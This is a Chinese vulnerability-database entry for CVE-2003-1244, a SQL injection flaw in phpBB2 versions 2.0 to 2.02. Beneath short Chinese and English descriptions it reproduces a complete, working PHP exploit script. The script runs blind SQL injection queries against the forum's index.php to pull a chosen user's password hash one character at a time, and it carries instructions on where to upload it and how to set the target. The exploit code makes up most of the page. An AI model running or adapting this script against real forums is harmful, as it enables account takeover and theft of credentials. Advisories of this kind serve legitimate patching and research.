PHPBB2远程SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107205 漏洞类型 SQL注入
发布时间 2003-02-19 更新时间 2006-01-17
CVE编号 CVE-2003-1244 CNNVD-ID CNNVD-200312-246
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22267
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-246
|漏洞详情
phpBB是一款流行的开放源代码BBS系统。phpBB2部分脚本没有充分过滤用户提供的输入,远程攻击者可以利用这个漏洞对数据库进行未授权操作,获得系统敏感信息。由于phpBB2部分脚本对用户输入缺少充分检查,攻击者可以提交恶意SQL命令修改原来phpBB2系统的SQL逻辑,造成攻击者未授权修改数据库,可能以phpBB2管理员身份进入应用系统。
|漏洞EXP
source: http://www.securityfocus.com/bid/6888/info

A SQL injection vulnerability has been reported in phpBB2.

phpBB2, in some cases, does not sufficiently sanitize user-supplied input which is used when constructing SQL queries. As a result, attackers may supply malicious parameters to manipulate the structure and logic of SQL queries. This may result in unauthorized operations being performed on the underlying database. This issue may be exploited to cause sensitive information to be disclosed to a remote attacker. 

<?php

########## PHPBB 2.0,2.01,2.02 Auto-SelectFish Attacker
########## David@cgishield.com


// To use this program, simply upload it to a php enabled webserver, and execute
// If php times out before the whole password hash is determined, 
// adjust the maximum script execution time in php.ini
// Also, replace following with correct values:

$server="192.168.1.100";
$script="/phpbb2/index.php";
$the_userid_to_hack="2";


// don't change this
$data_to_match="In total there are <b>0</b> users online";

$checkchar[0]="char(48)";
$checkchar[1]="char(49)";
$checkchar[2]="char(50)";
$checkchar[3]="char(51)";
$checkchar[4]="char(52)";
$checkchar[5]="char(53)";
$checkchar[6]="char(54)";
$checkchar[7]="char(55)";
$checkchar[8]="char(56)";
$checkchar[9]="char(57)";
$checkchar[a]="char(97)";
$checkchar[b]="char(98)";
$checkchar[c]="char(99)";
$checkchar[d]="char(100)";
$checkchar[e]="char(101)";
$checkchar[f]="char(102)";

for($i=1;$i<33;$i++){
reset($checkchar);
while (list($i2, $i2val) = @each($checkchar)){
$vars="forum_id=1+or+user_id=$the_userid_to_hack+and+mid(user_password,$i,1)=$checkchar[$i2]/*";
$data=sendToHost("$server",'post',"$script","$vars");
if (eregi("$data_to_match","$data")){
//echo("<b>$i2</b>");
}
else{echo("<br>$i= $i2"); flush();break;}
}
}


function sendToHost($host,$method,$path,$data,$useragent=1)
{
$method = strtoupper($method);
$fp = fsockopen($host,80);
fputs($fp, "$method $path HTTP/1.1\n");
fputs($fp, "Host: $host\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
fputs($fp, "Content-length: " . strlen($data) . "\n");
if ($useragent)
fputs($fp, "User-Agent: Mozilla\n");
fputs($fp, "Connection: close\n\n");
if ($method == 'POST')
fputs($fp, $data);
while (!feof($fp))
$buf .= fgets($fp,128);
fclose($fp);
for($slow=0;$slow<100;$slow++){}

return $buf;
}

?>
|参考资料

来源:BID
名称:6888
链接:http://www.securityfocus.com/bid/6888
来源:XF
名称:phpbb-pageheader-sql-injection(11376)
链接:http://www.iss.net/security_center/static/11376.php
来源:BUGTRAQ
名称:20030220phpBBSecurityBugs
链接:http://archives.neohapsis.com/archives/bugtraq/2003-02/0245.html
来源:NSFOCUS
名称:4439
链接:http://www.nsfocus.net/vulndb/4439